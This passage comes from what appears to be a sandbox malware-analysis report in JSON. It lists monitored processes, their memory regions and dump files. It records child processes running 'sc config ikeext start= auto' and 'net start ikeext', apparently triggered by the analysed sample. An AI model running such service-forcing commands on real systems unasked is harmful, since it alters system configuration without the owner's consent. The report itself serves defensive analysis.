"private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:00:48.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000016-region_00001233-addr_0x0000000000690000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_254", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 6946815, "entry_point": 0, "filename": null, "id": "region_1233", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:00:48.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1234", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:48.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1235", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:48.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1236", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:48.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1237", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:48.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1238", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:48.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1239", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:48.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1240", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:48.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1241", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:48.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1242", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:48.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 1605631, "entry_point": 0, "filename": null, "id": "region_1243", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:48.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1244", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:48.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1245", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:48.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1667071, "entry_point": 0, "filename": null, "id": "region_1246", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:48.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1712127, "entry_point": 0, "filename": null, "id": "region_1247", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:48.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000016-region_00001248-addr_0x00000000002b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_255", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_1248", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:48.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000016-region_00001249-addr_0x00000000002c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_256", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_1249", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:48.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5967871, "entry_point": 0, "filename": null, "id": "region_1250", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:00:48.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 19529727, "entry_point": 0, "filename": null, "id": "region_1251", "name": "pagefile_0x00000000006a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6946816, "timestamp": "00:00:48.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 19529728, "type": "region", "version": 1 }, "end_va": 20983807, "entry_point": 0, "filename": null, "id": "region_1252", "name": "pagefile_0x00000000012a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19529728, "timestamp": "00:00:48.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21037056, "type": "region", "version": 1 }, "end_va": 23982079, "entry_point": 21037056, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1253", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21037056, "timestamp": "00:00:48.486", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "sc config ikeext start= auto", "filename": "c:\\windows\\system32\\sc.exe", "id": "proc_17", "image_name": "sc.exe", "monitor_reason": "child_process", "monitored_id": 17, "origin_monitor_id": 16, "ref_parent_process": { "ref_id": "proc_16", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000017-region_00001254-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_257", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1254", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:48.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1255", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:48.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1256", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:48.491", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000017-region_00001257-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_258", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1257", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:48.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3194879, "entry_point": 3145728, "filename": "\\Windows\\System32\\sc.exe", "id": "region_1258", "name": "sc.exe", "norm_filename": "c:\\windows\\system32\\sc.exe", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:00:48.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1259", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:48.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1260", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:48.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1261", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:48.502", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000017-region_00001262-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_259", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1262", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:48.502", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000017-region_00001263-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_260", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1263", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:48.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1264", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:48.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1265", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:48.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1266", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:48.516", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000017-region_00001267-addr_0x00000000000e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_261", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_1267", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:48.517", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000017-region_00001268-addr_0x00000000004d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_262", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_1268", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:00:48.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1269", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:48.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1270", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:48.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1271", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:48.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1272", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:48.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1273", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:48.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1274", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:48.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1275", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:48.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1276", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:48.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1277", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:48.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1048575, "entry_point": 983040, "filename": "\\Windows\\System32\\en-US\\sc.exe.mui", "id": "region_1278", "name": "sc.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\sc.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:00:48.614", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\cmd.exe /c \"net start ikeext\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_18", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 18, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000018-region_00001279-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_263", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1279", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:48.641", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000018-region_00001280-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_264", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1280", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:48.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_1281", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:48.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1282", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:48.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1283", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:48.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1284", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:48.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1285", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:48.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1286", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:48.645", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000018-region_00001287-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_265", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_1287", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:48.645", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000018-region_00001288-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_266", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": 